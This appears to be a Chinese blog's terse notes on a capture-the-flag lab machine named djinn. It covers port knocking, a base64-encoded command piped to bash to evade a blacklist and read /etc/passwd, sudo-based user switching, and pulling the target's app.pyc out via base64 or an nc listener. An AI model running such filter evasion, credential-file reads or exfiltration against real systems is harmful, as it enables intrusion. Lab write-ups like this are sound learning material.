这篇文章上次修改于 184 天前,可能其部分内容已经发生变化,如有疑问可询问作者。

敲门服务
knock 192.168.5.130 1356 6784 3409
然后nmap再度扫描就开了

这个网站可以看出火绒等安全软件进程.jpg
2111131325ip反查域名.jpg
674de0d467fe4d24a466199f46280764.png
用burpsuite排查黑名单

|的意思是上一条命令的结果,作为下一条命令的输入
echo "Y2F0IC9ldGMvcGFzc3dkCg=="|base64 -d|bash
假如说有黑名单字符的话,那么我们将整句话base64加密,然后在这里再解码就行
|bash就是以bash的方式运行,其实有没有都可以执行的

nitish用户终端下sudo -l 得到这个
User nitish may run the following commands on djinn:

(sam) NOPASSWD: /usr/bin/genie

意思是nitish这个用户可以以sam的方式去运行genie这个命令

2.jpg
一行为一个用户,每行最后一个字段为用户的shell执行环境,nologin代表无法登陆系统

useradd –d /home/sam -m sam添加用户

sudo -u sam id 意思是以sam的方式运行id
su 用户名 切换用户

对于一个已经编译过的pyc文件,我们想传到本地来,有两种办法,一种是nc连接的上传
还有一种是base64编码以后复制粘贴
现在演示base64的方法
base64 app.pyc
A/MNCgYZzF1jAAAAAAAAAAAIAAAAQAAAAHMIAQAAZAAAZAEAbAAAWgAAZAAAZAIAbAEAbQIAWgIA
bQMAWgMAbQQAWgQAbQUAWgUAbQYAWgYAAWUCAGUHAIMBAFoIAGQDAGUIAF8JAGQEAFoKAGQFAGQG
AGQHAGQIAGQJAGQKAGQLAGQMAGcIAFoLAGQNAIQAAFoMAGUIAGoNAGQFAGQOAGQPAGcBAIMBAWQQ
AIQAAIMBAFoOAGUIAGoNAGQRAGQOAGQSAGQPAGcCAIMBAWQTAIQAAIMBAFoPAGUIAGoNAGQUAGQO
AGQPAGQSAGcCAIMBAWQVAIQAAIMBAFoQAGUHAGQWAGsCAHIEAWUIAGoRAGQXAGQYAGQZAGUSAIMA
AgFuAABkAQBTKBoAAABp/04oBQAAAHQFAAAARmxhc2t0CAAAAHJlZGlyZWN0dA8AAAByZW5k
ZXJfdGVtcGxhdGV0BwAAAHJlcXVlc3R0BwAAAHVybF9mb3J0AwAAAGtleXMbAAAAL2hvbWUvbml0
aXNoLy5kZXYvY3JlZHMudHh0dAEAAAAvdAEAAAAudAEAAAA/dAEAAAAqdAEAAABedAEAAAAkdAQA
AABldmFsdAEAAAA7YwEAAAADAAAABQAAAEMAAABzbwAAAHQAAHwAAGsGAHIcAGQBAHwAAGsHAHIc
AHQBAFN5OgB4LwB0AgBEXScAfQEAeB4AfAAARF0WAH0CAHwBAHwCAGsCAHIzAHQDAFNxMwBXcSYA
V3QBAFNXbhIABHQEAGsKAHJqAAEBAXQDAFNYZAAAUygCAAAATnQDAAAAY2F0KAUAAAB0BQAAAENS
RURTdAQAAABUcnVldAMAAABSQ0V0BQAAAEZhbHNldAkAAABFeGNlcHRpb24oAwAAAHQDAAAAY21k
dAEAAABpdAEAAABqKAAAAAAoAAAAAHMOAAAAL29wdC84MC9hcHAucHl0CAAAAHZhbGlkYXRlDQAA
AHMUAAAAAAEYAQQCAwENAQ0BDAEMAQgBDQF0BwAAAG1ldGhvZHN0AwAAAEdFVGMAAAAAAAAAAAIA
AABDAAAAcwoAAAB0AABkAQCDAQBTKAIAAABOcwkAAABtYWluLmh0bWwoAQAAAFICAAAAKAAAAAAo
AAAAACgAAAAAcw4AAAAvb3B0LzgwL2FwcC5weXQFAAAAaW5kZXgbAAAAcwIAAAAAAnMFAAAAL3dp
c2h0BAAAAFBPU1RjAAAAAAIAAAAGAAAAQwAAAHN4AAAAdAAAagEAagIAZAEAgwEAfQAAfAAAcmoA
dAMAfAAAgwEAck4AdAQAagUAfAAAZAIAdAYAZAMAdAQAagcAgwECaggAagkAgwAAfQEAbgYAZAQA
fQEAdAoAdAsAZAUAZAYAfAEAgwEBgwEAU3QMAGQHAIMBAFNkAABTKAgAAABOUhQAAAB0BQAAAHNo
ZWxsdAYAAABzdGRvdXRzFQAAAFdyb25nIGNob2ljZSBvZiB3b3Jkc3QFAAAAZ2VuaWV0BAAAAG5h
bWVzCQAAAHdpc2guaHRtbCgNAAAAUgMAAAB0BAAAAGZvcm10AwAAAGdldFIXAAAAdAoAAABzdWJw
cm9jZXNzdAUAAABQb3BlblIQAAAAdAQAAABQSVBFUh0AAAB0BAAAAHJlYWRSAQAAAFIEAAAAUgIA
AAAoAgAAAHQHAAAAZXhlY3V0ZXQGAAAAb3V0cHV0KAAAAAAoAAAAAHMOAAAAL29wdC84MC9hcHAu
cHl0BAAAAHdpc2ggAAAAcxAAAAAAAhIBBgEMARIBGAIGAhYCcwYAAAAvZ2VuaWVjAAAAAAEAAAAE
AAAAQwAAAHM6AAAAZAEAdAAAagEAawYAciQAdAAAagEAagIAZAEAgwEAfQAAbgYAZAIAfQAAdAMA
ZAMAZAQAfAAAgwEBUygFAAAATlIfAAAAcxIAAABJdCdzIG5vdCB0aGF0IGhhcmRzCgAAAGdlbmll
Lmh0bWx0BAAAAGZpbGUoBAAAAFIDAAAAdAQAAABhcmdzUiEAAABSAgAAACgBAAAAdAQAAABwYWdl
KAAAAAAoAAAAAHMOAAAAL29wdC84MC9hcHAucHlSHgAAAC8AAABzCAAAAAACDwEVAgYCdAgAAABf
X21haW5fX3QEAAAAaG9zdHMHAAAAMC4wLjAuMHQFAAAAZGVidWcoEwAAAFIiAAAAdAUAAABmbGFz
a1IAAAAAUgEAAABSAgAAAFIDAAAAUgQAAAB0CAAAAF9fbmFtZV9fdAMAAABhcHB0CgAAAHNlY3Jl
dF9rZXlSDwAAAFIRAAAAUhcAAAB0BQAAAHJvdXRlUhoAAABSKAAAAFIeAAAAdAMAAABydW5SEAAA
ACgAAAAAKAAAAAAoAAAAAHMOAAAAL29wdC84MC9hcHAucHl0CAAAADxtb2R1bGU+AQAAAHMWAAAA
DAIoAgwBCQIGAh4DCQ4hBSQPJAoMAQ==
得到很多的字符
然后复制一下
到kali上,vim app64 粘贴
base64 -d app64 >> app.pyc 完成

nc的话就是kali上监听某个端口nc -lvnp 7777>111.pyc
目标主机上nc ip 7777 <111.pyc

QQ图片20211115143453.jpg
msf的爆破

merterpreter下show_moute,挂载对方的硬盘
service apache2 start 然后在kali下的/var/www/html下就是开启网站了

QQ截图20211115180656.jpg
QQ截图20211115181143.jpg
QQ截图20211115181220.jpg
QQ截图20211115181355.jpg
QQ截图20211115233211.jpg
QQ截图20211115233227.jpg